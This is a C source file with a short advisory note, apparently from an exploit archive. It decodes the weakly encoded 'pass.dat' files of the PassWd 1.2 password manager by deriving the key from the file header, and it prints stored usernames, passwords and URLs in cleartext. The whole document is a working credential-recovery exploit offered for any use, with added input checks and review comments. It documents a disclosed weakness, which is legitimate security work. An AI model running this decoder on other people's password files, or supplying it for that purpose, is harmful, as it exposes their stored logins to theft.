
// source: https://www.securityfocus.com/bid/1300/info
PassWd 1.2 is a password management utility designed to store user login information for various URLs. The login information, which includes the username, password and link location, is stored in the pass.dat file, which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key, which can be used to decode any stored password.
/*
 * Decoder for PassWD v1.2 `pass.dat' password files
 *
 * Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 * This code is hereby placed in the public domain.
 * Use this code at your own risk for whatever you want.
 *
 * The decoded data is not parsed in any way - it should
 * be very easy for moderately experienced programmers
 * to add that themselves.
 *
 */
#include <stdio.h>
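/*
 * Decode a PassWD v1.2 `pass.dat' file.
 *
 * Usage: <prog> <infile> [<outfile>]
 *
 * The file starts with a three-byte header: one byte that is skipped,
 * then two bytes from which the key is computed.  Every following byte
 * is looked up in a 99-character table and replaced by the character
 * `key' positions earlier in that table (with wrap-around).
 *
 * Returns 0 on success and 1 on a usage error, an I/O error or a
 * malformed input file.
 *
 * The input file is untrusted: every byte read from it is checked for
 * EOF and the key is range-checked before it is used as a table offset.
 * The output is cleartext login data; when <outfile> is given it is
 * created with the process's default permissions.
 */
int main(int argc, char *argv[])
{
    enum { ALPHABET_LEN = 99 };

    /*
     * The 99-character alphabet, stored twice in a row so that
     * `pos + ALPHABET_LEN - key' can be used as an index without a
     * modulo operation.
     *
     * NOTE(review): the upper-case run reads "...QRSPUVWXYZ", i.e. a
     * second 'P' sits where 'T' would be expected.  Kept byte-for-byte
     * from the original; confirm against a real pass.dat whether this
     * is a typo or a property of the format.
     */
    static const unsigned char charset[] =
        "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
        "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
    _Static_assert(sizeof charset == 2 * ALPHABET_LEN + 1,
                   "charset must hold the alphabet exactly twice");

    FILE *infile = NULL;
    FILE *outfile = NULL;
    int status = 1;
    int a;
    int b;
    int key;
    int x;

    printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
    printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

    if ((argc > 3) || (argc < 2)) {
        printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
        printf("If <outfile> is omitted, the output is dumped to stdout.\n");
        return 1;
    }

    infile = fopen(argv[1], "r");
    if (infile == NULL) {
        printf("Could not open file %s\n", argv[1]);
        return 1;
    }

    if (argc == 2) {
        outfile = stdout;
    } else {
        outfile = fopen(argv[2], "w");
        if (outfile == NULL) {
            printf("Could not write to file %s\n", argv[2]);
            goto done;
        }
    }

    /*
     * getc() results are kept in int so that EOF stays distinguishable
     * from the data byte 0xFF; stored in an unsigned char the EOF test
     * could never be true.
     */
    getc(infile);     /* jump over decoy byte */
    a = getc(infile); /* read encoded key byte 1 */
    b = getc(infile); /* read encoded key byte 2 */

    if (a == EOF || b == EOF) {
        printf("ERROR - encountered EOF within header\n");
        goto done;
    }

    /* this line `decodes' the key */
    key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

    /*
     * The doubled table only covers keys 0..ALPHABET_LEN.  A larger key
     * taken from a malformed or hostile file would make the index below
     * negative and read memory in front of the table.
     */
    if (key > ALPHABET_LEN) {
        printf("ERROR - key in header is out of range\n");
        goto done;
    }

    /* read through infile and dump decoded output to outfile: */
    while ((x = getc(infile)) != EOF) {
        int pos = -1;

        for (int i = 0; i < ALPHABET_LEN; i++) {
            if (charset[i] == x) {
                pos = i;
                break;
            }
        }
        if (pos < 0) {
            printf("\nERROR - encountered illegal character in source file\n");
            goto done;
        }

        /* plain = cypher - key */
        putc(charset[pos + ALPHABET_LEN - key], outfile);
    }

    if (ferror(infile)) {
        printf("\nERROR - read error in source file\n");
        goto done;
    }

    if (argc == 2) {
        printf("\n\n");
    }
    printf("Done.\n");
    status = 0;

done:
    /* Close only what this function opened; stdout is left alone. */
    if (outfile != NULL && outfile != stdout) {
        fclose(outfile);
    }
    fclose(infile);
    return status;
}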